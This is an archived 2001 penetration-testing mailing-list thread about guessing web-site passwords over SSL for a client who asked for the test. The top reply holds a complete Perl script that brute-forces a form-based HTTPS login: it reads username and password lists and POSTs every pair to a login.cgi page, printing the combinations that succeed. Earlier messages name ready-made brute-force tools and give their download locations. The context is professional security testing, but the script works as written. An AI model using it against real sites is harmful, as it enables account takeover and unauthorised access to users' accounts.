It's done very simple by using perl Net::SSLeay something like this.
Just an example:
#!/usr/local/bin/perl
use Net::SSLeay, qw(post_https make_form);
open(USR, "< users.txt") || die "Unable to open users file.\n";
open(PWD, "< passwd.txt") || die "Unable to open passwd file.\n";
while(<PWD>) { chop; $passwd[@passwd] = $_ }
close(PWD);
while(<USR>)
{
foreach $pwd(@passwd)
{
chop;
($page, $result, %headers)
= post_https('www.victim.com', 443, '/login.cgi', '',
make_form('login'=>$_,
'password'=>$pwd));
if ($page =~ "Login Successful") { print "$_:$pwd was correct\n" }
}
}
close(USR);
On Tue, 17 Apr 2001, Batten, Gerald wrote:
> I'm not trying to crack the SSL session itself. I'm just trying to get an
> idea of the quality of passwords the users are using for that site, but from
> an external test only.
>
> The web server is not using the typical 'username/password' pop-up box,
> they're using a dynamically generated form, which has a different URL every
> time the page is brought up. The user enters their userid and password in
> the form and clicks on 'submit' which uses the HTTP POST method. The
> session is SSL-encrypted as well. The difficulty I am having is that short
> of writing my own perl script (which I am desperately trying to avoid...
> sorry, I don't like coding any more), none of the tools I have found can
> brute-force a form-based login over SSL. I tried using sslproxy and stunnel
> on NT/2000, but those ports lack some of the functionality I need. My next
> step is to try and convince one of my Linux co-workers to run stunnel on
> their system.
>
> Gerald.
>
> Note: Views expressed in this e-mail do not necessarily represent those of
> my employer.
> Note: Views expressed in this e-mail are not necessarily mine either.
>
> -----Original Message-----
> From: John R. Sciandra [mailto:johnrsat_private]
> Sent: Tuesday, April 17, 2001 1:37 PM
> To: PEN-TESTat_private
> Subject: Re: Web site password guessing over SSL
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Ok don't flame for being a bone head but let me pose a counter
> question or two.
>
> I was under the impression that (typically) SSL is run a mode that
> only encrypts the transport between the client and server. I think it
> is possible to use SSL to restrict access to the web server by userid
> in some modes but that generally is not how SSL is setup.
>
> If I understand correctly you are just trying to crack the web servers
> challenge. I think that what happens with cracking the web servers
> password is more of an end point dialog between the web server and the
> client. So if you can establish your SSL session (as if you were
> browsing the site) and are able to get the prompt for userid and
> password that the web server presents, you should be in business. Did
> I miss it? Do you have to do something extra with the SSL?
>
> If on the other hand you are trying to crack the actual SSL session
> itself...I am not sure but doesn't that involve cracking RSA or
> something?
>
> - -John
>
> - -----Original Message-----
> From: Penetration Testers [mailto:PEN-TESTat_private]On Behalf
> Of Joel Brown
> Sent: Friday, April 13, 2001 10:52 AM
> To: PEN-TESTat_private
> Subject: Re: [PEN-TEST] Web site password guessing over SSL
>
>
> ssl.cracker.exe at
> http://neworder.box.sk/search.php3?srch=ssl+brute should work,
> also check out ObiWan at
> http://www.phenoelit.de/obiwan/
>
> Joel
>
> >>Our client wants us to try to brute-force one of their public web
> sites
> that
> >>is password-protected via a form-based login over SSL.
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP for Personal Privacy 5.5.5
>
> iQA/AwUBOtx/NX0lZ+LOrv8nEQJYcgCfX66o15M5e6q5dKMIz9Wb89qOszYAoJVa
> 7wsHwn7aq3oCpCSE87BnrXXn
> =jTZ8
> -----END PGP SIGNATURE-----
>
This archive was generated by hypermail 2b30 : Tue Apr 17 2001 - 17:49:11 PDT